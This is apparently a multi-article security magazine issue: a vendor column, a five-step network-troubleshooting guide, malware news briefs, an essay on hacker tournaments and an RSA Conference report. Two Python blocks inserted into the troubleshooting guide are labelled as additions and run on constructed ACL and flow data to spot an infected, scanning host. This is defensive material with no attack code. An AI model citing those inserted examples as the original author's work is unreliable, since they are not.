Popularity aside, the best way to determine if a system is going to work for you will be based on two factors: (a) its feature/function set and (b) its proven track record in similar environments. In basketball terms, it's called scouting; going beyond the brand logo that's affixed to a particular product and really understanding the system's dynamics, strengths and benefits.

In the IT security world, organizations should not have to determine this all on their own, but rather enlist their system integrators and product vendors to help make this happen. The best partners are the ones who have offerings that specifically meet this demand. They should also have an arsenal of best practices to provide companies with lessons learned from others.

4. Do you have the right people in place?

While this may appear odd coming from the head of a product manufacturer, I'm a firm believer that a robust security posture can only be delivered if there are good people in place to make it happen. Good teams can only go so far without good leadership and talented professionals; be it a college basketball team or IT staff.

What's more, this is not unlike other business operations, such as offshore software development or outsourced product fulfillment, where long-standing benefits of such initiatives are not realized without oversight and monitoring authority.

Herein lies the dilemma for many companies. Budget debates must focus not just on implementing firewalls, e-mail gateways and unified threat management offerings, but also on the individuals and resources needed to set overarching policies and management procedures. If they are absent, all the money spent keeping up with the latest tools and systems will be for naught.

The thing I enjoy most about college basketball is watching young teams that, while seemingly over their head on paper, play well against the bigger squads - sometimes even beating them. It should be a good reminder to many of us that the quality of a system should not be measured according to the hype that surrounds it, but rather according to its effectiveness - and IT systems are no exception.



Max Huang is the founder and President of O2Security, Inc., a manufacturer of high-performance network security appliances for small- to medium-businesses as well as remote/branch offices, large enterprises and service providers. Max can be reached at max.huang@o2security.com.
"My application is slow. Is it the network?" How many times have you heard this question? Most likely too often, since network reliability is the first thing that is questioned when something happens.



A network is comprised of any number of different single components, all designed and configured to work together in an interdependent fashion. It is this interdependency that is difficult to decode. Network troubleshooting requires logic and knowledge.

One of the core responsibilities of the IT department is to design, deploy and maintain a network that is secure and reliable, and then to monitor and manage it 24/7. But how do you troubleshoot the less obvious problems?

Troubleshooting a network requires an in-depth knowledge of not only the physical connectivity of the network, but also how it is configured.

Some of the troubleshooting challenges one must contend with on an everyday basis include:

• Lack of analysis and troubleshooting tools

• Inadequate or outdated network documentation

• Deficient or non-existent change control policies

• Limited knowledge of layer 2 topology and connectivity

• Inconsistent system configuration

• Loss of personnel with historical network knowledge

• Multiple point solutions and tools

The following is a simple five-step plan to seek out where the problems lie.

Step 1: Eliminate the obvious

Sometimes the root cause of a problem can be relatively simple. By starting with some of the more common sources first, you could save a lot of time. The following list provides some suggestions about where to start your troubleshooting efforts.
• IP address conflicts

• DNS errors

• Improper subnet configuration

• Switch port disabled

• Open TCP ports

• Failed device

There are a lot of standalone tools available that can assist with locating the obvious problems. Your monitoring solutions will also provide notification when a device failure occurs. Once you have got the obvious things out of the way, you can start to look at the more complicated and difficult ones.

Step 2: Digging deeper 

Troubleshooting a network requires patience and time. First ask yourself:

• When did the problem first arise?
  o After the rollout of new devices or changes to the network
  o After changes to a single device
  o After deployment of a new application

• Is it isolated to a particular set of devices or segment, or is it systemic?

• Is the problem occurring at layer 2 or layer 3?

• Is the problem occurring at the edge of the network?

• What are the symptoms of the problem?
  o Degraded VoIP performance
  o Intermittent periods of slow performance
  o Periodic loss of connectivity

• Have traffic or utilization patterns changed?
  o Unusual peaks
  o Increased utilization

• Has your service provider made recent changes or had an outage?

All network monitoring solutions can highlight and alert to problems involving connectivity, device failures, etc. What about troubleshooting nebulous issues like a slow network? Historically, network troubleshooting has been a largely manual process. Previously IT has had to rely on a set of static paper maps to piece together a "problem-area" map to troubleshoot a problem.

One of the key issues using this method is the reliance on maps that may be outdated or inaccurate. The simple truth is that most network documentation is at least two or more generations behind the current state of the infrastructure.

If the network maps or diagrams are unavailable or inaccurate, engineers move to the second and more time consuming method - manually discovering and creating network diagrams while troubleshooting. Either way, valuable time is lost diagnosing the problem.






Step 3: Building an up-to-date connectivity view

Many monitoring solutions provide a discovery capability - some more in-depth than others. Ideally you will want one that identifies not only devices and servers, but VMware virtual machines, VLANs and port to port connectivity. Since networks can be considered 'living entities', discovery should be run regularly to ensure that you are troubleshooting based on the most current state of the infrastructure.



Without up-to-date information, troubleshooting any issue is going to be prolonged and most likely inaccurate.

Step 4: Examine performance metrics 

You are probably monitoring key performance metrics across your physical and server resources. When key monitored metrics such as processor utilization, memory utilization, storage, network usage or disk I/O are all individually well within the critical thresholds that you have configured, you should be looking at the application level itself.

Step 5: Analyze network traffic and configuration settings

Recent studies estimate that 75% of network outages or degradations in performance are due to device or system misconfiguration. The remaining 25% are typically caused by inappropriate usage, attacks by malware or equipment failures.

This is why troubleshooting efforts should include flow monitoring and configuration management, so you know what is happening in your current infrastructure at a much more detailed level. Here are some specific problem scenarios, to illustrate this point.

Problem Scenario 1: Access to a remote application seems to work fine for requests but responses are very slow.

What types of traffic are passing over the WAN link?

Using flow analysis, you can view the current traffic by type, source and destination. The analysis shows that the current traffic is normal and bandwidth utilization is within the threshold.



What has changed? 

Examining device configuration settings on either end of the WAN link, you discover that a recent change to routing has introduced an asymmetric path. This configuration change resulted in traffic to the application taking the optimal path and traffic from the application taking a longer route, causing the slow application response time.

Problem Scenario 2: Users are complaining about poor VoIP voice quality and dropped calls.

Performance monitoring tools are not showing any failures or connectivity issues for any VoIP devices or servers. Is the problem isolated to certain segments or is it across the whole network?

Flow analysis and looking at traffic across different segments shows that congestion is occurring on a backbone segment and this is causing degraded VoIP quality and dropped calls.

Detailed analysis of specific traffic types, QoS, and sources and destinations shows that even though VoIP has the highest priority, video downloads by a large number of users are consuming the available bandwidth.






Problem Scenario 3: A segment of the network loses access to some server-based applications but not others.

What has changed? 

Configuration analysis shows that the ACL on the segment switch was changed, excluding a range of IP addresses, some of which are assigned to the servers running the applications. Revising the ACL restores access to the applications.
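One way to run the kind of configuration check this scenario calls for, as an added example that is not from the article or from any Ipswitch product: it compares the servers reachable under an ACL before and after a change, so the troubleshooter's "what has changed?" gets a concrete answer. The ACL format is a simplified assumption (ordered permit/deny entries with a CIDR, first match wins, implicit deny at the end) rather than any real switch syntax, and every address, server name and ACL entry is constructed for illustration.

```python
import ipaddress
from typing import Dict, List, Tuple

# Simplified ACL representation (assumption: the article does not show the
# real switch syntax). Entries are (action, network), evaluated top-down;
# the first matching entry wins, and an implicit deny applies when none match.
Rule = Tuple[str, str]

# Constructed ACLs: the state before the change, the state after the change
# that broke access, and a revised ACL that only blocks the intended host.
ACL_BEFORE: List[Rule] = [
    ("permit", "10.20.0.0/16"),
]
ACL_AFTER: List[Rule] = [
    ("deny", "10.20.5.0/24"),      # the recent change: a whole range is excluded
    ("permit", "10.20.0.0/16"),
]
ACL_REVISED: List[Rule] = [
    ("deny", "10.20.5.200/32"),    # narrowed to the single host that was meant
    ("permit", "10.20.0.0/16"),
]

# Constructed application servers the affected segment needs to reach.
APP_SERVERS: Dict[str, str] = {
    "crm-app": "10.20.5.10",
    "mail": "10.20.5.25",
    "intranet": "10.20.7.40",
    "fileshare": "10.20.9.8",
}


def parse_acl(rules: List[Rule]):
    """Validate actions and turn CIDR strings into network objects."""
    parsed = []
    for action, net in rules:
        if action not in ("permit", "deny"):
            raise ValueError(f"unknown ACL action: {action!r}")
        parsed.append((action, ipaddress.ip_network(net, strict=False)))
    return parsed


def acl_allows(acl, ip: str) -> bool:
    """First-match evaluation with an implicit deny at the end."""
    addr = ipaddress.ip_address(ip)
    for action, net in acl:
        if addr in net:
            return action == "permit"
    return False


def blocked_servers(rules: List[Rule], servers: Dict[str, str]) -> List[str]:
    """Names of servers that the given ACL prevents the segment from reaching."""
    acl = parse_acl(rules)
    return sorted(name for name, ip in servers.items() if not acl_allows(acl, ip))


def newly_blocked(before: List[Rule], after: List[Rule], servers: Dict[str, str]) -> List[str]:
    """Servers reachable under the old ACL but blocked under the new one:
    the diff a troubleshooter wants after asking 'what has changed?'."""
    return sorted(set(blocked_servers(after, servers)) - set(blocked_servers(before, servers)))


if __name__ == "__main__":
    print("broken by the change:", newly_blocked(ACL_BEFORE, ACL_AFTER, APP_SERVERS))
    print("still broken after revision:", newly_blocked(ACL_BEFORE, ACL_REVISED, APP_SERVERS))
```

The same `newly_blocked` comparison works as a pre-change check: run it against the proposed ACL before pushing it and the exclusion of the application servers shows up before any user notices.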



Problem Scenario 4: Bandwidth utilization suddenly rises to peak levels and is not declining.

What type of traffic is it and where is it originating?

Using flow analysis tools you can find out the source and traffic type, which in this case reveals that a small UDP packet is being sent to all the IP addresses in the segment from a single machine. There are also packets being sent to a destination outside the network.
Once the IP address of the source system has been determined, the system is put on an isolated VLAN and found to be infected. A Trojan horse was flooding the network with connection requests to other systems in order to spread the infection.
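The triage in Scenario 4, as an added example that is not part of the article or of any Ipswitch product: a short flow-analysis pass over constructed flow records that groups traffic by source, flags a host that has sent very small UDP packets to a large number of distinct addresses inside its own segment, and lists the outside addresses that host has also contacted. The 10.20.5.0/24 segment, the 10.0.0.0/8 "internal" range, the thresholds and every flow record are constructed for illustration, not taken from any real export.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Flow:
    """One flow record: the fields a flow exporter would summarise."""
    src: str
    dst: str
    proto: str
    dst_port: int
    packets: int
    octets: int


# Constructed addressing (not from the article): the affected segment and
# the address space considered internal to the organisation.
SEGMENT = ipaddress.ip_network("10.20.5.0/24")
INTERNAL = [ipaddress.ip_network("10.0.0.0/8")]


def build_sample_flows() -> List[Flow]:
    """Constructed flow records standing in for a flow collector's export."""
    flows: List[Flow] = []
    # Ordinary traffic: three workstations using the file server and DNS.
    for host in (11, 12, 13):
        flows.append(Flow(f"10.20.5.{host}", "10.20.5.200", "tcp", 445, 120, 150_000))
        flows.append(Flow(f"10.20.5.{host}", "10.20.0.53", "udp", 53, 4, 320))
    # The scenario's symptom: one host sends a single small UDP packet to
    # every address in the segment and also talks to an outside address.
    for target in range(1, 255):
        flows.append(Flow("10.20.5.77", f"10.20.5.{target}", "udp", 1434, 1, 60))
    flows.append(Flow("10.20.5.77", "203.0.113.9", "tcp", 8080, 30, 4_500))
    return flows


def is_external(ip: str) -> bool:
    """True when the address falls outside every internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def analyse_flows(flows: List[Flow], segment: ipaddress.IPv4Network,
                  min_targets: int = 50, max_avg_octets: float = 100.0) -> Dict[str, dict]:
    """Group flows by source and report sources that touched many distinct
    in-segment destinations with tiny UDP packets, plus their external peers."""
    udp_targets: Dict[str, Set[str]] = defaultdict(set)
    udp_octets: Dict[str, List[float]] = defaultdict(list)
    external: Dict[str, Set[str]] = defaultdict(set)
    for f in flows:
        if is_external(f.dst):
            external[f.src].add(f.dst)
        if f.proto == "udp" and ipaddress.ip_address(f.dst) in segment:
            udp_targets[f.src].add(f.dst)
            udp_octets[f.src].append(f.octets / f.packets)
    findings: Dict[str, dict] = {}
    for src, targets in udp_targets.items():
        avg = sum(udp_octets[src]) / len(udp_octets[src])
        if len(targets) >= min_targets and avg <= max_avg_octets:
            findings[src] = {
                "targets": len(targets),
                "avg_octets": avg,
                "external": sorted(external.get(src, set())),
            }
    return findings


if __name__ == "__main__":
    for src, info in analyse_flows(build_sample_flows(), SEGMENT).items():
        print(f"{src}: {info['targets']} in-segment UDP targets, "
              f"avg {info['avg_octets']:.0f} bytes/packet, external peers {info['external']}")
```

The two thresholds (distinct targets and average packet size) are what separate a host sweeping its segment from a workstation doing ordinary DNS lookups; tune them to the segment size. The external peer list is what you hand to whoever examines the isolated host, since it shows where the traffic leaving the network was going.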

Conclusion 

Access to current and historical configuration data will provide a baseline from which it is simpler to understand the impact of changes to systems and the results of those changes.

Such technologies can quickly identify where bottlenecks and over-utilization are occurring.

By integrating more traditional monitoring approaches that include network discovery and mapping, performance monitoring, real-time alerts and historical reports (combined with more advanced flow and configuration monitoring and analysis tools), you can avoid common troubleshooting pitfalls.

If you use a single IT management solution that offers monitoring across devices, servers, applications, physical and virtual resources, port-to-port connectivity, configuration and network traffic over a single console, it will increase network reliability and stability.

Network troubleshooting is largely a process of elimination that can be frustrating and rewarding at the same time. Approach it one step at a time, and good luck with your future troubleshooting endeavors!



Ennio Carboni is the President of Ipswitch Network Management Division (www.ipswitch.com). He is responsible for setting and managing the implementation of the division's strategic direction and leading its sustainable, profitable growth as a provider of network management solutions for effective management of wired and wireless networks in traditional and virtualized environments.
Malware world



Targeted attacks focus on nationalistic and economic cyberterrorism

Phishing, compromised websites, and social networking are carefully coordinated to steal confidential data, because in the world of cybercrime, content equals cash. And, as a new Websense report illustrates, the latest tactics have now moved to a political and nationalistic stage. (www.net-security.org/malware_news.php?id=1526)




A viable answer to the botnet problem?

As the case of the Bredolab botnet takedown has shown yet again, going after C&Cs is ultimately a failed tactic for shutting botnets down. It is time to try something new, and two security researchers might be on the right track. Peter Greko and Fabian Rothschild have developed a number of methods that should severely compromise the accuracy of the collected data and, therefore, make the botmasters' customers unsatisfied with the merchandise. (www.net-security.org/malware_news.php?id=1525)



Man loses millions in computer virus-related scam

A US court has heard that a couple conned at least $6 million from the great-grandson of an oil industry tycoon after he brought his virus-infected computer in for repair. Although the victim's name has not been released by the authorities, media reports have named him as jazz pianist and composer Roger Davidson. The couple are said to have tricked the composer into believing that, while investigating the virus, they had found evidence that his life was in danger - concocting a story that the virus had been tracked to a hard drive in Honduras. (www.net-security.org/malware_news.php?id=1524)
Microsoft offers Security Essentials via Windows Update, Trend Micro objects

Trend Micro is crying foul over the Microsoft move that sees its U.S. customers being offered to install the company's free Security Essentials solution through the Windows Update service - if no antivirus solution is detected on the system. The computer security company is of the opinion that such a move offers Microsoft an unfair advantage over its competition. (www.net-security.org/malware_news.php?id=1522)



New variant of Boonana Trojan discovered

A new variant of the Boonana malware has been discovered by ESET. The new variant, trojan.osx.boonana.b, behaves in a very similar manner to the original malware, and is currently being distributed on multiple sites. Rather than the initial site which tricks users into running (and installing) the malware, these servers seem to be hosting update code for the malware. (www.net-security.org/malware_news.php?id=1521)



ZeuS attackers set up honeypot for researchers

Investigation into a spam campaign notifying potential victims that their tax payment was rejected due to an error with the Electronic Federal Tax Payment System has revealed that these ZeuS-peddling criminals used an exploit toolkit that had a fake administration panel which functions as a honeypot that documents details of every attempt to access it or hack it. (www.net-security.org/malware_news.php?id=1520)



A "private" banking Trojan competes with ZeuS

The recent surge of brand new banking Trojans continues to give us more things to worry about. The latest one is named "Feodo", and it has been around for months now, but was probably considered to be just a variant of the more popular ZeuS and SpyEye malware. Further analysis showed that even though it has some features in common with them, Feodo has its own characteristics. (www.net-security.org/malware_news.php?id=1505)



Spam and virus trends according to Google

The analysis of the data for Q3 of this year shows that spam is down by 16% when compared to the numbers of the previous quarter, but that payload virus volume is up by a whopping 42%, making Google's experts speculate that the spam volumes in Q4 will rise again because the malicious payloads of this quarter are meant to enslave computers into spamming botnets just in time for them to be used during the holiday season. (www.net-security.org/malware_news.php?id=1502)
Kaspersky download site hacked, redirecting users to fake AV

Kaspersky's USA download site was hacked. For three and a half hours, it was providing download links that redirected users to a malicious web page where windows telling them their computer was infected were popping up and they were encouraged to buy a fake AV solution. (www.net-security.org/malware_news.php?id=1499)



Bugat Trojan linked to LinkedIn phishing campaign

Researchers have discovered a new version of the Bugat financial malware used to commit online fraud. Bugat was distributed in the recent phishing campaign targeting LinkedIn users, which was generally considered to be trying to infect machines with the more common Zeus Trojan. (www.net-security.org/malware_news.php?id=1493)



Trojan overrides Firefox password-saving behavior

Whenever something of tangible value exists, there will always be those who will try to steal it, says a group of researchers that published a paper on future malware threats. They maintain that social networks will not only be the playground on which this malware will spread, but also the main target - due to the massive amount of data concerning relationships and communication patterns between people. (www.net-security.org/malware_news.php?id=1490)



The rise of crimeware

CA researchers identified more than 400 new families of threats, led by rogue security software, downloaders and backdoors. Trojans were found to be the most prevalent category of new threats, accounting for 73 percent of total threat infections reported around the world. Importantly, 96 percent of Trojans found were components of an emerging underground trend towards organized cybercrime, or "Crimeware-as-a-Service." (www.net-security.org/malware_news.php?id=1488)



A peek into Google's anti-malware operation

Google goes to great lengths to secure its users from threats lurking on the Web, because a half-hearted effort would soon drive them out of business.

But, during his presentation at the SecTor security conference in Toronto, Google security researcher Fabrice Jaubert revealed that sometimes even seemingly good methods are thwarted by careless users. (www.net-security.org/malware_news.php?id=1516)
Cybercriminals aggressively recruiting money mules

Money mules have been aggressively recruited this year to help cyber criminals launder money, according to Fortinet. A recent example of this is the worldwide prosecutions of a Zeus criminal operation, which included 37 charges brought against alleged money mules. (www.net-security.org/malware_news.php?id=1513)




Facebook phishing worm compromises thousands of accounts

A very effective phishing worm has been targeting Facebook users and has been compromising their accounts by luring them with the offer of seeing a video. The victim would receive an instant message from a contact asking "Is this you?" and supposedly offering a link to the video, but actually providing a link to a malicious Facebook application which loads a phishing page into an iframe. (www.net-security.org/malware_news.php?id=1511)



50 ISPs harbor half of all infected machines worldwide

A group of researchers have recently released an analysis of the role that ISPs could play in botnet mitigation - an analysis that led to interesting conclusions. The often believed assumption that the presence of a high speed broadband connection is linked to the widespread presence of botnet infection in a country has been proven false. (www.net-security.org/malware_news.php?id=1531)




The persistence of Trojan attacks and scareware

Statistics from GFI show a staggeringly consistent attack primarily by the same Trojan horse programs that have persisted for several months. Trojans detected as Trojan.Win32.Generic!BT were still the chief detection, slightly down to 23.54 percent of total detections. This generic detection includes more than 120,000 traces of malicious applications and has been in the top spot for many months. (www.net-security.org/malware_news.php?id=1487)




Arrests of money mules follow ZeuS gang takedowns

Recent arrests and indictments of two gangs (one based in the U.K. and one in the U.S.) that used the ZeuS Trojan to siphon huge amounts of money from private and business banking accounts all over the two countries have put a spotlight on the methods banks use to secure online transactions. So far, the investigations showed that the great majority of these illegal transfers were Automated Clearing House (ACH) transactions, and that they were unauthorized. In both cases, the members of the gangs were predominantly Eastern Europeans and Russians. (www.net-security.org/malware_news.php?id=1485)
America's cyber cold war

by Blaine Anderson



Considering the way the American government has treated hackers (ethical or not) in the past, I find it kind of ironic that it is now hosting hacking tournaments.



It used to be that the public was taught to think that the only thing that hackers were good for is creating computer viruses, stealing people's identities, shutting down global networks and launching nuclear attacks with a whistle and a telephone. Hackers were considered to be "the outlaws of cyberspace" and the media portrayed them as being relentlessly hunted by the American government and prosecuted to the fullest extent of the law.

With the passing of the years, we discovered that most of what we thought was true, wasn't. Now we know that there is a difference between a hacker and a cracker; we know that many "hackers" have actually made the world a better place. The U.S.A. has gone from being a country that persecutes hackers to one that organizes hacker camps and hosts hacker tournaments, encouraging children and individuals to take up "cyber arms" in order to gain the upper hand in the global cyber-arms race, which it is currently losing.

American tournaments

One of these tournaments is called NetWars. Established in June of 2009, it is basically an online version of a capture-the-flag style contest. In order to compete in the tournament, competitors must download an ISO CD-ROM image (which can be burned to a disk or virtualized and booted from) and begin to exploit various weaknesses. Then, they must use their knowledge of exploits to score points by placing their name into root files within certain environments. As the competition unfolds, tournament administrators insert hurdles and roadblocks in order to make things more difficult for the competitors.

Contestants are also allowed to terminate other players' connections and exploits, demonstrating their offensive capabilities. It is a no-holds-barred competition that pits some of America's best up-and-coming hackers against each other. Competitors are allowed to use any and all software available to them, and in a previous event, one contestant was even given extra points for breaking into the scoring system and boosting his standing. The tournament lasts three days and is held every few months. The next competition is still unscheduled because, as Ed Skoudis, one of the designers of NetWars, tells me, "we've put NetWars on hold while we revamp the system. We're designing a whole new NetWars Next Generation, which we'll debut later in the fall."
The National Collegiate Cyber Defense Competition is held each year, and not only does it make the competitors fend off incoming attacks, but it also asks of them to maintain a business network while doing it. "CCDC competitions ask student teams to assume administrative and protective duties for an existing 'commercial' network - typically a small company with 50+ users, 7 to 10 servers, and common Internet services such as a web server, mail server, and e-commerce site," it says on the NCCDC's website.

This event does more than just challenge the 
competitors to defend a network from outside 
attacks - it simulates a real-world environ- 
ment, giving college students a better idea of 
what they will be doing in their careers. While 
competitors are defending their system from 
attackers, they are also given various other 
tasks to accomplish throughout the tourna- 
ment. They are responsible for things like add- 
ing users to the Active Directory, changing set- 
tings on routers, or repairing FTP servers. 
This event is for college students only, and 
any students working in a full-time IT position 
are disqualified from this tournament. 

The Air Force also held a hacking chal- 
lenge in May 2009, at the Department of 
Defense Intelligence Information Systems 
Worldwide Conference in Orlando, Florida. 
The goal was to develop the skills of some 
2000 security professionals in attendance, 
rather than recruiting fresh young talent. It was 
also a capture-the-flag style tournament, ex- 
cept that instead of attacking each other, 
teams of security professionals had four days 
to search an isolated network for "flags" that had 
been planted by the hosts. Teams were 
placed in a dark room with strobe and flashing 
red lights, and were continuously bombarded 
with other distractions in order to simulate a 
real-world environment. There is no word on 
whether or not another competition like this 
will be held again. 

Most hacker tournaments are modeled after 
the competitions held at DEF CON - the larg- 
est and the best-known hacker convention in 
the world. Every year since 1993, DEF CON 
has attracted some of the most famous (and 
infamous) hackers in the world. Originally or- 
ganized by Jeff Moss, a.k.a. Dark Tangent, as 
a one-time "good-bye party" for the Platinum 
Net BBS system, it has grown into an annual 
occurrence that spans three days. 

Four years later, Moss created the Black Hat 
security conference. It was created as a 
means to gather security professionals and 
law enforcement into one place and urge them 
to share ideas, educate each other and dis- 
cuss cutting-edge research. Both of these 
events have set the bar for security conven- 
tions all over the world, as well as pushed for 
the acceptance of ethical hacking by main- 
stream society. 

These conferences were (and are) designed 
for people within the security community to 
disseminate information, and educate the pub- 
lic about the dual nature of hacking tech- 
niques - they can be used for good or for bad 
purposes. What was once considered a black 
hat attack on a company is now a white hat 
penetration test. By testing for vulnerabilities, 
professionals are able to create networks that 
are more secure and harder to break into. 
But, the U.S. isn't the only country organizing 
these types of challenges - throughout the 
world, hacker tournaments are moving from 
the dark corners of underground hacker con- 
ventions and are becoming government- 
sanctioned events. 

International tournaments 

The Nuit-du-hack competition has been held 
in France each year since 2003. This "Night of 
Hack" is modeled after DEF CON's Capture 
the Flag tournament. Twelve teams of five 
people compete from midnight till 7 A.M. in a 
capture-the-flag style competition that also 
features guest speakers from top profession- 
als in the industry. Prizes include passes to 
Miami's Hacker Halted security conference 
and several other trainings, books, and 
equipment. 

The India-based Security Byte/OWASP con- 
vention has also recently hosted a capture- 
the-flag style tournament, offering prize 
money that totals over 150,000 Rupees 
(around $3,400.00). This convention is de- 
signed for security professionals from all over 
India and around the world. What makes CTF 
HackHunt unique is that it consists of three 
stages. 
The first stage is a knowledge test, and only 
the top ten percent of competitors are allowed 
to compete in the next stage - a test of skills 
during which the contestant must retrieve a 
flag, which is essential for registering for the 
main event. The third and final stage consists 
of compromising a predetermined wireless 
network protected by WPA or WPA2 encryp- 
tion. 

This tournament is one of the three that are 
held during this convention. Security Byte/ 
OWASP also hosts a competition called 
PacketWars - a real-time information warfare 
simulation, during which the same software 
and hardware one would encounter in the real 
world is featured. The third event is called 
Web War III. The first stage of the competition 
consists of two-man teams searching for vul- 
nerabilities in a web application hosted on a 
virtual web server and patching them. In the 
second stage, teams attack each other and try 
to exploit the vulnerabilities that haven't been 
patched. The team with the most points wins. 

These tournaments are only a small part of 
the security conference during which they are 
held. Although the aforementioned conven- 
tions held in India and France aren't 
government-sanctioned, you can be sure that 
recruiters from both the private and govern- 
ment sectors were in attendance and were 
keeping an eye on the competitors. 






What has changed? 

It used to be that agents from various gov- 
ernment agencies attended DEFCON and a 
number of other well-known hacker conven- 
tions in order to arrest wanted criminals. As 
the need for talented security professionals 
that would work for those agencies grew, they 
have begun sending recruiters to bring back 
employees - instead of agents looking to 
bring in suspects. Jim Gosler, the founding 
Director of the CIA's Clandestine Information 
Technology Office says that "there are only 
1000 security specialists with the skills 
needed working in the field, while somewhere 
between 20,000 and 30,000 are needed." 

Professor Philip Holt - a professional penetra- 
tion tester trained by the American govern- 
ment and respected information security pro- 
fessional - thinks that it is the government's 
lack of preparation that has us in the position 
we are in. According to him, the U.S. govern- 
ment has long had a "we can do it" mentality 
when it comes to cyber-security, but it is now 
slowly beginning to realize that they need help 
- lots of it, and fast. 

The U.S. has - along with the rest of the world 
- become increasingly reliant on computers 
and the networks they run on. Employing a 
cyber-offensive as part of a greater military 
campaign would give any invading or attack- 
ing country a great advantage. Nuclear power 
plants, dams and power grids, communication 
and transportation, finance and education - 
everything depends on computers. 

If we were to go to war with a super-power like 
China or Russia, it would only make sense for 
them to launch a cyber-offensive coinciding 
with the physical ground attack. In a television 
interview done for AT&T in November 2007, 
Marcus J. Ranum downplayed the likelihood of 
cyber-terrorism or cyber-war, noting that there 
would be major world market consequences 
to such an attack. He said that an attack like 
that would affect everyone in the world, and 
would only be used in cooperation with some 
sort of ground attack or invasion. 

Personally, I agree with Ranum. The stability 
of the economy of many countries is tied to 
the stability of our financial market. It would be 
suicide for a country like China to crash our 
market. I do, however, think that we need to 
be prepared for anything, especially a cyber 
attack that could cripple our entire country. We 
also have to take into consideration cyber- 
espionage and realize that there are countries 
that are trying to steal our national secrets by 
hacking into the computers that hold them. 
There are so many different areas of our na- 
tion that we need to protect, and we currently 
don't have the manpower to do so. 

Defending our "cyber borders" is much more 
difficult than defending our physical ones. It 
takes next to nothing to teach a soldier to fire 
a gun, but in order to protect our cyber inter- 
ests, our defenders need to have years and 
years of training under their belts. Getting into 
and excelling at network and computer secu- 
rity takes as much dedication and practice as 
getting into and excelling at professional 
sports. Cyber security experts have to know 
how to defend the networks from attacks, but 
they also have to be able to take overflowing 
amounts of data and analyze it in order to 
predict an attack that may be coming. 

This is not a career that allows one to just take 
a 12-week course and be ready to defend a 
company or a country - it takes a life-long 
commitment. For years, the government has 
been telling us that there is nothing to worry 
about and that they have everything under 
control. It has created dozens of groups, 
boards, and committees to "regulate" Internet 
and network security - only to realize that 
there is much more work to be done, and that 
higher-level security experts are needed to 
make it happen. It is only now that they are 
admitting that we are vulnerable, and that we 
need to do something about it. 






Another reason why it has been so hard to 
protect our nation is because the government 
is competing with private companies for quali- 
fied personnel, and they are both drawing 
from an already small pool. Private companies 
have just as much at stake, being that they 
are often contracted by the government to 
carry out different aspects of national security. 

It seems that every powerful nation and corpo- 
ration is vying for limited talent in the shape of 
elite information security specialists. Corpo- 
rate espionage is just as likely as national es- 
pionage, and companies are willing and able 
to pay - often even more than what the gov- 
ernment can offer - in order to protect their 
secrets. 

Also, not only is the U.S. government compet- 
ing with private companies, it is competing 
against every other country in the world. Most 
international superpowers are stockpiling se- 
curity professionals, at times recruiting them 
right out of high school. 

In an article written by Tom Gjelten, he tells a 
story about a student from China who was 
caught hacking into a computer system lo- 
cated in Japan. Rather than being charged as 
a criminal, he was rewarded with more train- 
ing. That particular individual was later caught 
hacking into the Pentagon 
(tinyurl.com/2633rxp). 

Countries all over the world are realizing that 
cyber security is a necessity, and that such 
professionals need to be discovered at a very 
young age and helped to reach their full po- 
tential. 

The future 

But, not all hope is lost. The first step is admit- 
ting that we have a problem. People within the 
industry are talking, and the government is 
listening. We are beginning to target young- 
sters with the skills and the interest needed to 
become the guardians of our cyberspace. We 
are beginning to educate the youth in our 
country, offering courses like Hackid. 

Hackid is a nonprofit conference that offers 
children (aged 5 to 17) a hands-on education 
about things like basic web design, hardware 
and software manipulation, network and appli- 
cations security, and a dozen other topics. 
The Air Force Association organizes Cyber 
Patriot, a cyber security competition for high 
school students. Similar to its college counter- 
part - the Collegiate Cyber Defense Competi- 
tion - this contest is geared toward setting 
high school students on the road to become 
cyber warriors. 

Those opposed to these types of camps and 
tournaments say that we are encouraging 
children to become hackers and teaching 
them how to be criminals. I say that by offer- 
ing the tournaments we are giving them a 
chance to develop their skills in a legal and 
educational manner. 

Conclusion 

Before tournaments like these became a regu- 
lar occurrence, hackers had to do illegal 
things to get the experience they needed. 
Now there is a legal outlet that will ultimately 
help our country in a time of need. By teach- 
ing children from an early age, we can teach 
them responsibility and awareness. You can 
compare it to a father teaching his child to 
shoot a gun. Yes, that child will know how to 
use a gun, but he (or she) will also be taught 
about the responsibility that goes hand in 
hand with that use. Cyber security is no differ- 
ent. There are always those that will use this 
knowledge for doing bad things, but if we 
teach and promote responsible use of these 
tools, we will do more good than bad. 

We are in the middle of a cyber arms race, 
and we are losing. Fixing the shortage of 
qualified security professionals isn't going to 
be quick or easy. It is going to take time, 
training, support and patience. 

We, as a society, are going to have to do 
more to encourage our children to take an in- 
terest in technology, and give them the sup- 
port they need to be successful, no matter 
what field they choose. We are going to have to 
encourage children to explore computer net- 
works, in a legal and ethical manner, rather 
than accusing them of being criminals. It is our 
job to give them the opportunity to develop the 
technical skills needed to protect our nation's 
critical infrastructure. 



Blaine Anderson is an information security student at DeVry University in Seattle. He is a member of the Cyber 
Defense Club (which participates in hacker tournaments and challenges), the Student Senate, and Student 
Ambassadors. You can read his security blog at peopleperfectsecurity.blogspot.com, and you can contact him 
at blainevanderson@hotmail.com. 
If there are constants to every information security conference, they are 
these: threats are up and the job of the average security professional 
becomes more demanding every year. 



At the RSA Conference 2010 held in London 
this week, RSA's CEO Art Coviello illustrated 
the depth of some of the key issues the indus- 
try is dealing with, and acknowledged the 
growing complexity of the job at hand. 

It is estimated that IT professionals spend 
nearly 20% of their time on compliance. Many 
would argue that this takes care of the regula- 
tions, but actually doesn't achieve much be- 
sides giving them an ultimately false sense of 
security. 

"If we don't change our approach, we will be- 
come locked in a vicious cycle of costlier at- 
tacks, generating more public outrage, more 
regulations, compliance and reporting," 
Coviello noted. 

And the end result of these events would be 
less time available for companies to make 
themselves secure while the volume of elabo- 
rate attacks grows by the minute. 



With a soaring volume of Internet traffic and 
the proliferation of increasingly complex sys- 
tems, security professionals are dealing with a 
job that requires evolving security controls and 
adaptive procedures. It may sound easy to 
someone not working in the field, but giving 
the right people access at the exact time when 
it's needed can be quite an endeavor - espe- 
cially in this age of the mobile workforce. 

"What we've ended up with is an overabun- 
dance of point products applied independently 
across the infrastructure: anti-malware, e-mail 
and application encryption, data loss preven- 
tion, etc," says Tom Heiser, RSA's COO. That 
means that the average security professional 
has to manage several products from different 
vendors that need to work together in a hybrid 
environment. And judging by the conversa- 
tions I've been hearing this week, this is the 
starting point of many headaches. 

You can probably guess where RSA is going 
with this talk - a unified solution. 
